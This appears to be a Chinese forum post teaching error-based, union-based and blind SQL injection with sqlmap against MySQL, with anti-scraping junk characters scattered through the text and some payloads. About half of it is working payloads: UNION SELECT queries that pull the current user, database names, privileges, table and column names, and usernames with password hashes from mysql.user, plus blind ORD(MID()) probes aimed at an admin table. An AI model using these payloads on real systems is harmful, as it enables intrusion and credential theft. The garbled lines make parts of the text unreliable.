放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。5 u& K- I& ] q! K
6 T2 o" O! N! J" ?- f/ x$ m6 W! j1 w这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
- u; C5 p7 b" p6 C- X9 w ?1 W ( a1 m1 J% Y% W
分类标准 分类 备注; e P6 p- n2 k
按字段类型 整型注入,字符型注入
% x: u2 s# X2 Z; y1 R& C按出现的位置 get注入,post注入,cookie注入,http header注入
/ ?3 v* T, S/ q' x然而高级注入是这样的1 [- h; \: C$ T+ m9 U# \; `% D
2 R- Z% }% X& p k( a高级注入分类 条件
1 o' L0 e7 t' k6 r' qerror-based sql 数据库的错误回显可以返回,存在数据库,表结构
8 r8 x- z9 Y% B! ~6 V+ H( ^9 Runion-based sql 能够使用union,存在数据库,表结构3 w H/ N4 @$ I5 B
blind sql 存在注入
3 p" u6 S" w' w! M我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
( d: t+ x& Q$ ]! l* v - `. E/ [- [- g% u: Q7 s: Z
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
8 ]1 _. m, u5 O 3 u/ z4 e1 k5 n7 `7 U% A( `4 J
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。0 j& N- U( z+ r8 p
; `: v5 Z* ~5 L c7 }这里用mysql说明3 @* h) s6 `3 s! H0 B: S
$ |* D3 t9 n9 f* ]& h8 }6 e
e注入坛子里很多了,请看戳我或者再戳我
" ~3 h M; s: D% ^ y r% u$ ]0 V
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
+ h$ R& b3 B+ M2 i: N
# ?* j" l& F+ |1 O+ t2 ~获取当前数据库用户名
Y: g; J+ S2 c: j+ {& s" o
2 b$ S( G B" a) TUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
" r ?% A: P2 j/ C1 G$ bAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
+ H! Q, x0 y. k5 G3 L9 L9 `L, NULL#
) \+ U2 o4 f$ l注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
$ _" N# _/ M& c. x7 c
9 W. g$ U4 e9 `% A9 [4 c获取数据库名
, K& t0 O9 ?3 `: R+ D% T# M0 J+ F 0 z& O Q+ t, @' H
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#* @) i! ?6 i7 \$ {) ?$ ?
获取所有用户名
% T* a( g/ u: {; j5 J+ O L ' C. C0 P5 m0 F
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#7 h# X( l+ _7 D: y9 p- M) u
查看当前用户权限+ l6 N6 W9 f6 L' F5 P
0 ^" W* r+ t( W; N9 V: ~0 p1 HUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
4 n5 e2 v" h" w! n- y尝试获取密码,当然需要有能读mysql数据库的权限
" `; K b2 S& J5 }4 |" W+ l2 l
5 Y) \9 P4 ^: w% {; }UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
, x/ w9 y7 \6 ]' V8 M/ t" @获取表名,limit什么的自己搞啦
5 m0 |+ v9 s0 m5 G I2 @* l 6 q1 U2 A9 g( a2 i
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
/ _; ^8 S5 j! m6 r4 l获取字段名及其类型6 B/ l: Y9 t( c7 x4 N7 O- C
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#7 ^ j% Q, T& {
) q4 s2 S8 Z. ~/ p* s5 [' K- e# A; Zb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
6 W. T+ K1 |# V 2 x' F9 {# f1 X( ~# u. U
如:) k u: W/ f& o% X7 E
获取当前用户名& N* H* x8 h- P9 L- H$ f
; }* }) q5 n# a; s/ O
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116) D" @" \# r- s
获取当前数据库
! u; A- [$ u9 ~
4 ]/ v9 F( N/ XAND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106' ^8 p3 j L) W; u0 f' x; |/ i2 Q, K
获取表名2 H7 {, I; u- W0 @8 T
1 o) E9 N! o6 m& l7 MAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51- P0 ]! h, a! D0 x) X" F* T+ ]
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。4 J9 T' \! m0 F- t
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
S9 `$ q' S3 d y% ?3 m1 Y0 a$ ?爆表
# j8 m! p1 l. f$ v6 `0 j 3 N* H1 b( m# k5 |
AND EXISTS(select * from table)
6 a7 E5 Y# {9 w: o. T爆字段1 {; W5 c- e) n3 ~7 U* A
# {" W( u- Z! W: X7 d9 ]
AND EXISTS(select pwd from table)4 j+ H& M7 @0 t2 L9 g3 f
盲注的变化就比较多了,由于篇幅,只是举个例子而已。% \1 W# W: u ^' |: w& u
# c) R- g+ i. V本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
9 ~! b4 D, ^5 N8 @. ~( ] |